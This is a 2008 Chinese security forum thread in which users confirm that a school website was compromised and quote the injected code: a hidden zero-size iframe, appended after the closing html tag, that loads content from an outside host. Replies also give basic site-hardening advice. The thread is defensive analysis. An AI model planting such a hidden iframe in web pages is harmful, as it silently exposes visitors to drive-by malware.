12   1  /  2  页   跳转

[求助] 我学校这个网站真有病毒吗

我学校这个网站真有病毒吗

http://www.yjyizhi.com/ 会不会是误报....现在我瑞星版本是最新的

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)
最后编辑超级游戏迷 最后编辑于 2008-08-29 21:58:23
分享到:
gototop
 

回复:我学校这个网站真有病毒吗

偶非常勇敢地点了进去
结果半天没出来
gototop
 

回复:我学校这个网站真有病毒吗

被挂马了 不要进了暂时 瑞星没误报
gototop
 

回复:我学校这个网站真有病毒吗

钓鱼网站,不要进。瑞星真的没误报,KIS2009拦截了,是钓鱼网站
gototop
 

回复:我学校这个网站真有病毒吗



引用:
<iframe src=http://www.92bdd.com/xs/index.htm width=0 height=0></iframe>
最后编辑豪斯登堡新郎 最后编辑于 2008-08-29 21:47:51
不认识我没关系,因为我也不认识你。
gototop
 

回复: 我学校这个网站真有病毒吗

尾部挂马方式,截取该网站代码尾部内容:


引用:
  <area shape="rect" coords="13,11,167,44" href="student_2/index.html">
</map>
<map name="Map6">
  <area shape="rect" coords="10,8,158,42" href="2008jianzhang.htm">
</map>
<map name="Map8">
  <area shape="rect" coords="11,4,160,44" href="bm/bm3.asp">
  <area shape="rect" coords="149,34,153,38" href="#">
  <area shape="rect" coords="30,30,43,31" href="#">
  <area shape="rect" coords="151,35,153,45" href="#">
</map>
</body>
</html>

<iframe src=http://www.92bdd.com/xs/index.htm width=0 height=0></iframe>


最后一行红色代码即为网马。

如果对个别网站不信任,可以用附件这个工具查看网页代码,进行安全分析(我不太懂网页代码,就提供个工具吧):

附件附件:

下载次数:155
文件类型:application/octet-stream
文件大小:
上传时间:2008-8-29 21:55:52
描述:rar

最后编辑超级游戏迷 最后编辑于 2008-08-29 21:57:53
打酱油的……
gototop
 

回复:我学校这个网站真有病毒吗

起至是尾部挂马,脑袋上还三个呢
gototop
 

回复:我学校这个网站真有病毒吗

请检测你的网站

1,扫描病毒木马
2,检查你的网站安全设置,权限等特别是网站目录的权限
3,检测你的网站是否存在端口漏洞,如果打开过多的端口很容易被中上灰鸽子
4,检测你的网站是否存在跨站攻击漏洞,尽快升级你的网站或更换网站程序
gototop
 

回复: 我学校这个网站真有病毒吗



引用:
原帖由 清风阁☆四少 于 2008-8-29 22:06:00 发表
起至是尾部挂马,脑袋上还三个呢 
那就麻烦楼上做个全面的分析吧
打酱油的……
gototop
 

回复:我学校这个网站真有病毒吗

IE7里的查看源文件不是也可以看代码吗?
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT